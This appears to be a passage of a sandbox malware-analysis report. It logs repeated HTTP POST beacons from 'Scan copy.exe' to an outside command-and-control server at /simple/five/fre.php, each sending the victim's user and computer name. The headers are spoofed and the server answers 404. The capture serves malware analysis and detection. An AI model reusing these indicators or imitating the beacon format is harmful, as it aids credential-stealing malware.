                            Nov 28, 2024 09:14:22.036772966 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:14:22.160779953 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:14:23.475658894 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:14:23 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            5192.168.2.74971694.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:14:23.740595102 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:14:23.860631943 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:14:25.137492895 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:14:24 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            6192.168.2.74972294.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:14:25.399589062 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:14:25.519659042 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:14:27.269006014 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:14:27 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            7192.168.2.74973094.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:14:27.547003031 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:14:27.668725014 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:14:28.997591019 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:14:28 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            8192.168.2.74973394.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:14:29.265110016 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:14:29.385370016 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:14:30.852818966 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:14:30 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            9192.168.2.74973994.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:14:31.115309000 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:14:31.235320091 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:14:32.658634901 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:14:32 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            10192.168.2.74974594.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:14:32.931236029 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:14:33.051469088 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:14:34.411667109 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:14:34 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            11192.168.2.74975094.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:14:34.677262068 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:14:34.797317028 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:14:36.257673025 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:14:36 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            12192.168.2.74975594.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:14:36.543272972 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:14:36.663455963 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:14:38.124994040 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:14:37 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            13192.168.2.74976094.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:14:38.398513079 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:14:38.518569946 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:14:39.946322918 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:14:39 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            14192.168.2.74976494.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:14:40.209947109 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:14:40.330194950 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:14:41.795125961 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:14:41 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            15192.168.2.74977094.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:14:42.414340973 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:14:42.534472942 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:14:43.957528114 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:14:43 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            16192.168.2.74977594.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:14:44.225384951 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:14:44.345690966 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:14:45.763281107 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:14:45 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            17192.168.2.74977994.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:14:46.037662029 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:14:46.159487009 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:14:47.671871901 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:14:47 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            18192.168.2.74978594.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:14:47.943588972 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:14:48.063766003 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:14:49.534215927 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:14:49 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            19192.168.2.74979194.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:14:49.802853107 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:14:49.922880888 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:14:51.346460104 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:14:51 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            20192.168.2.74979594.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:14:51.616909981 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:14:51.737035990 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:14:53.209688902 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:14:52 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            21192.168.2.74979994.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:14:53.571193933 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:14:53.691338062 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:14:55.171257973 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:14:54 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            22192.168.2.74980494.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:14:55.442383051 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:14:55.562437057 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:14:57.021995068 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:14:56 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            23192.168.2.74980894.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:14:57.294624090 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:14:57.414725065 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:14:58.885855913 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:14:58 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            24192.168.2.74981494.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:14:59.152620077 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:14:59.272741079 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:15:00.692267895 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:15:00 GMT
